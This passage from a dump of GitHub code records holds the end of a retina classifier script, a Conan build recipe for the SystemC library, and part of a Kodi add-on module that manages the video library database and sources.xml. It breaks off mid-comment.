clf.predict(output.squeeze(1))\r\n\r\nprint(confusion_matrix(train_label_.numpy(), svm_label))\r\n","repo_name":"sunwbgt/FHWA-EAR-Retina_Classifier","sub_path":"retinaface_prediction.py","file_name":"retinaface_prediction.py","file_ext":"py","file_size_in_byte":14407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2704367580","text":"from conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport functools\nimport os\n\nrequired_conan_version = \">=1.43.0\"\n\n\nclass SystemcConan(ConanFile):\n name = \"systemc\"\n description = \"\"\"SystemC is a set of C++ classes and macros which provide\n an event-driven simulation interface.\"\"\"\n homepage = \"https://www.accellera.org/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n license = \"Apache-2.0\"\n topics = (\"simulation\", \"modeling\", \"esl\", \"tlm\")\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"disable_async_updates\": [True, False],\n \"disable_copyright_msg\": [True, False],\n \"disable_virtual_bind\": [True, False],\n \"enable_assertions\": [True, False],\n \"enable_immediate_self_notifications\": [True, False],\n \"enable_pthreads\": [True, False],\n \"enable_phase_callbacks\": [True, False],\n \"enable_phase_callbacks_tracing\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"disable_async_updates\": False,\n \"disable_copyright_msg\": False,\n \"disable_virtual_bind\": False,\n \"enable_assertions\": True,\n \"enable_immediate_self_notifications\": False,\n \"enable_pthreads\": False,\n \"enable_phase_callbacks\": False,\n \"enable_phase_callbacks_tracing\": False,\n }\n\n generators = \"cmake\"\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _is_msvc(self):\n return str(self.settings.compiler) in [\"Visual Studio\", \"msvc\"]\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n del self.options.enable_pthreads\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def validate(self):\n if self.settings.os == \"Macos\":\n raise ConanInvalidConfiguration(\"Macos build not supported\")\n\n if self.settings.os == \"Windows\" and self.options.shared:\n raise ConanInvalidConfiguration(\"Building SystemC as a shared library on Windows is currently not supported\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n @functools.lru_cache(1)\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"DISABLE_ASYNC_UPDATES\"] = \\\n self.options.disable_async_updates\n cmake.definitions[\"DISABLE_COPYRIGHT_MESSAGE\"] = \\\n self.options.disable_copyright_msg\n cmake.definitions[\"DISABLE_VIRTUAL_BIND\"] = \\\n self.options.disable_virtual_bind\n cmake.definitions[\"ENABLE_ASSERTIONS\"] = \\\n self.options.enable_assertions\n cmake.definitions[\"ENABLE_IMMEDIATE_SELF_NOTIFICATIONS\"] = \\\n self.options.enable_immediate_self_notifications\n cmake.definitions[\"ENABLE_PTHREADS\"] = \\\n self.options.get_safe(\"enable_pthreads\", False)\n cmake.definitions[\"ENABLE_PHASE_CALLBACKS\"] = \\\n self.options.get_safe(\"enable_phase_callbacks\", False)\n cmake.definitions[\"ENABLE_PHASE_CALLBACKS_TRACING\"] = \\\n self.options.get_safe(\"enable_phase_callbacks_tracing\", False)\n cmake.configure()\n return cmake\n\n def build(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n self.copy(\"NOTICE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"cmake\"))\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"SystemCLanguage\")\n self.cpp_info.set_property(\"cmake_target_name\", \"SystemC::systemc\")\n # TODO: back to global scope in conan v2 once cmake_find_package* generators removed\n self.cpp_info.components[\"_systemc\"].libs = [\"systemc\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.components[\"_systemc\"].system_libs = [\"pthread\"]\n if self._is_msvc:\n self.cpp_info.components[\"_systemc\"].cxxflags.append(\"/vmg\")\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self.cpp_info.filenames[\"cmake_find_package\"] = \"SystemCLanguage\"\n self.cpp_info.filenames[\"cmake_find_package_multi\"] = \"SystemCLanguage\"\n self.cpp_info.names[\"cmake_find_package\"] = \"SystemC\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"SystemC\"\n self.cpp_info.components[\"_systemc\"].names[\"cmake_find_package\"] = \"systemc\"\n self.cpp_info.components[\"_systemc\"].names[\"cmake_find_package_multi\"] = \"systemc\"\n self.cpp_info.components[\"_systemc\"].set_property(\"cmake_target_name\", \"SystemC::systemc\")\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4943-conan-center-index","sub_path":"recipes/systemc/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15150529521","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\n\r\nfrom core.libs import *\r\n\r\n\r\ndef run_rpc(payload):\r\n logger.trace()\r\n try:\r\n data = jsontools.load_json(xbmc.executeJSONRPC(jsontools.dump_json(payload)))\r\n except Exception:\r\n logger.error()\r\n return [\"error\"]\r\n\r\n return data\r\n\r\n\r\ndef update(path=''):\r\n logger.trace()\r\n\r\n payload = {\r\n \"jsonrpc\": \"2.0\",\r\n \"method\": \"VideoLibrary.Scan\",\r\n \"id\": 1,\r\n \"directory\": path\r\n }\r\n\r\n while xbmc.getCondVisibility('Library.IsScanningVideo()'):\r\n xbmc.sleep(500)\r\n\r\n run_rpc(payload)\r\n\r\n\r\ndef clean(mostrar_dialogo=False):\r\n \"\"\"\r\n limpia la libreria de elementos que no existen\r\n @param mostrar_dialogo: muestra el cuadro de progreso mientras se limpia la biblioteca\r\n @type mostrar_dialogo: bool\r\n \"\"\"\r\n logger.info()\r\n payload = {\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.Clean\", \"id\": 1,\r\n \"params\": {\"showdialogs\": mostrar_dialogo}}\r\n data = run_rpc(payload)\r\n\r\n if data.get('result', False) == 'OK':\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef search_path_db(path):\r\n path = filetools.normalize_dir(path)\r\n\r\n sql = 'SELECT strPath FROM path WHERE strPath LIKE \"%s\"' % path\r\n nun_records, records = execute_sql_kodi(sql)\r\n if nun_records >= 1:\r\n logger.debug(records[0][0])\r\n return records[0][0]\r\n return None\r\n\r\n\r\ndef add_path_db(path, **kwargs):\r\n logger.trace()\r\n\r\n # Buscamos el idPath\r\n if not kwargs.get('idPath'):\r\n nun_records, records = execute_sql_kodi('SELECT MAX(idPath) FROM path')\r\n if nun_records == 1:\r\n kwargs['idPath'] = records[0][0] + 1\r\n else:\r\n kwargs['idPath'] = 0\r\n\r\n # Buscamos el idParentPath\r\n sql = 'SELECT idPath, strPath FROM path where strPath LIKE \"%s\"' % filetools.normalize_dir(filetools.dirname(path))\r\n nun_records, records = execute_sql_kodi(sql)\r\n if nun_records == 1:\r\n kwargs['idParentPath'] = records[0][0]\r\n\r\n else:\r\n sql = 'INSERT INTO path (idPath, strPath, scanRecursive, useFolderNames, noUpdate, exclude) VALUES ' \\\r\n '(%s, \"%s\", 0, 0, 0, 0)' % (kwargs['idPath'], filetools.normalize_dir(filetools.dirname(path)))\r\n execute_sql_kodi(sql)\r\n kwargs['idParentPath'] = kwargs['idPath']\r\n kwargs['idPath'] += 1\r\n\r\n kwargs['strPath'] = filetools.normalize_dir(path)\r\n sql = 'INSERT INTO path (%s) VALUES (%s)' % (\r\n ', '.join(kwargs.keys()),\r\n ', '.join(['\"%s\"' % v for v in kwargs.values()])\r\n )\r\n execute_sql_kodi(sql)\r\n\r\n\r\ndef execute_sql_kodi(sql):\r\n \"\"\"\r\n Ejecuta la consulta sql contra la base de datos de kodi\r\n @param sql: Consulta sql valida\r\n @type sql: str\r\n @return: Numero de registros modificados o devueltos por la consulta\r\n @rtype nun_records: int\r\n @return: lista con el resultado de la consulta\r\n @rtype records: list of tuples\r\n \"\"\"\r\n logger.trace()\r\n\r\n nun_records = 0\r\n records = None\r\n conn = None\r\n\r\n file_db = filter(\r\n lambda x: x.startswith('MyVideos'),\r\n os.listdir(xbmc.translatePath(\"special://userdata/Database\"))\r\n )[0]\r\n\r\n file_db = os.path.join(xbmc.translatePath(\"special://userdata/Database\"), file_db)\r\n\r\n try:\r\n import sqlite3\r\n conn = sqlite3.connect(file_db)\r\n cursor = conn.cursor()\r\n\r\n logger.info(\"Ejecutando sql: %s\" % sql)\r\n cursor.execute(sql)\r\n conn.commit()\r\n\r\n records = cursor.fetchall()\r\n if sql.lower().startswith(\"select\"):\r\n nun_records = len(records)\r\n if nun_records == 1 and records[0][0] is None:\r\n nun_records = 0\r\n records = []\r\n else:\r\n nun_records = conn.total_changes\r\n\r\n conn.close()\r\n logger.info(\"Consulta ejecutada. Registros: %s\" % nun_records)\r\n\r\n except Exception:\r\n logger.error()\r\n if conn:\r\n conn.close()\r\n\r\n return nun_records, records\r\n\r\n\r\ndef get_video_sources():\r\n logger.trace()\r\n from xml.dom import minidom\r\n\r\n sources_path = xbmc.translatePath(\"special://userdata/sources.xml\")\r\n\r\n if not os.path.exists(sources_path):\r\n return []\r\n\r\n xmldoc = minidom.parse(sources_path)\r\n video = xmldoc.childNodes[0].getElementsByTagName(\"video\")[0]\r\n paths = video.getElementsByTagName(\"path\")\r\n return [p.firstChild.data for p in paths]\r\n\r\n\r\ndef add_video_source(path, name):\r\n logger.trace()\r\n from xml.dom import minidom\r\n\r\n name = unicode(name, 'utf8')\r\n\r\n sources_path = xbmc.translatePath(\"special://userdata/sources.xml\")\r\n\r\n if os.path.exists(sources_path):\r\n xmldoc = minidom.parse(sources_path)\r\n else:\r\n # Crear documento\r\n xmldoc = minidom.Document()\r\n nodo_sources = xmldoc.createElement(\"sources\")\r\n\r\n for t in ['programs', 'video', 'music', 'picture', 'files']:\r\n nodo_type = xmldoc.createElement(t)\r\n element_default = xmldoc.createElement(\"default\")\r\n element_default.setAttribute(\"pathversion\", \"1\")\r\n nodo_type.appendChild(element_default)\r\n nodo_sources.appendChild(nodo_type)\r\n xmldoc.appendChild(nodo_sources)\r\n\r\n # Buscamos el nodo video\r\n nodo_video = xmldoc.childNodes[0].getElementsByTagName(\"video\")[0]\r\n\r\n # Buscamos el path dentro de los nodos_path incluidos en el nodo_video\r\n nodos_paths = nodo_video.getElementsByTagName(\"path\")\r\n list_path = [p.firstChild.data for p in nodos_paths]\r\n logger.debug(list_path)\r\n if path in list_path:\r\n logger.debug(\"La ruta %s ya esta en sources.xml\" % path)\r\n return\r\n logger.debug(\"La ruta %s NO esta en sources.xml\" % path)\r\n\r\n # Si llegamos aqui es por q el path no esta en sources.xml, asi q lo incluimos\r\n nodo_source = xmldoc.createElement(\"source\")\r\n\r\n # Nodo \r\n nodo_name = xmldoc.createElement(\"name\")\r\n nodo_name.appendChild(xmldoc.createTextNode(name))\r\n nodo_source.appendChild(nodo_name)\r\n\r\n # Nodo \r\n nodo_path = xmldoc.createElement(\"path\")\r\n nodo_path.setAttribute(\"pathversion\", \"1\")\r\n nodo_path.appendChild(xmldoc.createTextNode(path))\r\n nodo_source.appendChild(nodo_path)\r\n\r\n # Nodo \r\n nodo_allowsharing = xmldoc.createElement(\"allowsharing\")\r\n nodo_allowsharing.appendChild(xmldoc.createTextNode('true'))\r\n nodo_source.appendChild(nodo_allowsharing)\r\n\r\n # Añadimos a